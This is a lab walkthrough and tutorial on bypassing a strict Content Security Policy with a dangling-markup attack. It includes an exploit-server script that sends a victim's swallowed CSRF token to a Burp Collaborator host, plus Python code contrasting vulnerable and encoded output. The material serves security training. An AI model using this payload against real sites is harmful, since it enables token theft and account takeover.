Introduction to Reflected XSS protected by very strict CSP, with dangling markup attack
In this lab, a reflected cross-site scripting (XSS) vulnerability sits behind a strict Content Security Policy (CSP). The vulnerability exists because untrusted user input is reflected into the page without proper validation or output encoding. A dangling markup attack exploits this even though the CSP blocks inline scripts and outgoing requests: the injected markup leaves an attribute unterminated, so the rest of the page (including sensitive values such as a CSRF token) is swallowed into that attribute and carried out of the page, letting the attacker work around the CSP restrictions. To mitigate this risk, developers must validate input and encode output for the context in which it is rendered. Combining a comprehensive CSP with correct output encoding and regular security assessments minimises the risk of XSS, protects user data, and keeps the application secure.
Lab description: Reflected XSS protected by very strict CSP, with dangling markup attack
This lab uses a strict CSP that blocks outgoing requests to external web sites.
To solve the lab, first perform a cross-site scripting attack that bypasses the CSP and exfiltrates a simulated victim user's CSRF token using Burp Collaborator. You then need to change the simulated user's email address to hacker@evil-user.net.
You must label your vector with the word "Click" in order to induce the simulated user to click it. For example: <a href="">Click me</a>
You can log in to your own account using the following credentials: wiener:peter
Stepwise solution of the lab:
After opening the lab, you will see an option called My account. Click on My account.
Enter the provided credentials (wiener:peter) into the login form, then click Log in.
We are now logged in as wiener, and the account's email address is wiener@normal-user.net.
Now open Burp Collaborator and click Copy to clipboard. Keep the copied Collaborator URL; you will need it in the payload.
Click Go to exploit server, scroll down a little, and paste the payload below into the exploit body.
<script>
// Second visit: this page was opened via the injected link, and the browser put the
// swallowed page contents (including the CSRF token) into window.name. Send it to Collaborator.
if(window.name) {
new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name);
} else {
// First visit: send the victim to the lab with the email parameter carrying the
// "Click me" link followed by an unterminated <base target=' attribute.
location = 'https://YOUR-LAB-ID.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>
Now take the URL you copied from Burp Collaborator and substitute it for BURP-COLLABORATOR-SUBDOMAIN.
Then replace YOUR-LAB-ID with your lab ID. The simplest way is to replace the whole default URL. Example:
Before: https://YOUR-LAB-ID.web-security-academy.net/my-account
After: https://0a9300c7039decb5804b7b03006e0030.web-security-academy.net/my-account
Do the same for YOUR-EXPLOIT-SERVER-ID: copy your exploit server ID and paste it in its place.
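As an added example (not part of the original writeup), the following Python models the reflected email field that the lab's payload abuses: it shows why an unterminated <base target=' attribute carries the hidden CSRF token out of the page, and contrasts the vulnerable rendering with the attribute-encoded fix. The form markup, the token value and the exploit-server host are constructed placeholders, not the lab's real HTML or identifiers.

```python
import html
from typing import Optional

# Constructed input in the shape the lab's exploit puts in the email parameter:
# it closes the value attribute, injects the required "Click me" link, and leaves
# <base target=' unterminated so everything after it becomes the attribute value.
ATTACK_EMAIL = ("\"><a href=\"https://EXPLOIT-SERVER-ID-PLACEHOLDER/exploit\">"
                "Click me</a><base target='")
CSRF_TOKEN = "constructed-csrf-token-0123"  # constructed value, not a real lab token

def page_template(email_value: str, csrf: str) -> str:
    """Minimal stand-in for the my-account form (constructed, not the lab's HTML)."""
    return ('<form action="/my-account/change-email" method="POST">'
            f'<input type="text" name="email" value="{email_value}">'
            f'<input type="hidden" name="csrf" value="{csrf}">'
            '<button>Update email</button></form>')

def render_vulnerable(email: str, csrf: str) -> str:
    """Reflects the email parameter into the attribute with no output encoding."""
    return page_template(email, csrf)

def render_hardened(email: str, csrf: str) -> str:
    """Attribute-encodes the reflected value; quote=True also escapes " and '."""
    return page_template(html.escape(email, quote=True), csrf)

def dangling_target(document: str) -> Optional[str]:
    """Return the text an unterminated <base target=' attribute would swallow,
    or None if every <base> tag in the document is well formed. The browser
    reads up to the next matching quote (or the end of the document) as the
    target name, and that is what arrives in window.name on the opened page."""
    lowered = document.lower()
    start = lowered.find("<base")
    while start != -1:
        end = document.find(">", start)
        tag = document[start:end] if end != -1 else document[start:]
        for quote in ("'", '"'):
            if tag.count(quote) % 2:  # odd count: an attribute quote is still open
                opened = document.index(quote, start) + 1
                closing = document.find(quote, opened)
                return document[opened:] if closing == -1 else document[opened:closing]
        if end == -1:
            break
        start = lowered.find("<base", end)
    return None

def leaked_csrf(document: str, csrf: str) -> bool:
    """True if the swallowed attribute text would carry the CSRF token out."""
    swallowed = dangling_target(document)
    return swallowed is not None and csrf in swallowed
```

Running leaked_csrf on render_vulnerable returns True while render_hardened returns False, because html.escape turns the injected quote and angle brackets into entities and no <base> tag is ever created.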
I hope you enjoyed this article. Once you have completed it, we recommend moving on to the next one: Reflected XSS protected by CSP, with CSP bypass. Please leave a comment below and share the article with your friends. Good luck!
FAQS
Website security refers to protecting a website or web application from cyberattacks, unauthorised access, and other security threats.
Web application security means protecting a web application from attacks that exploit vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always good practice to use an up-to-date browser and keep your browser plugins patched, avoid malicious websites and links, enable two-factor authentication, and stay alert to clickjacking.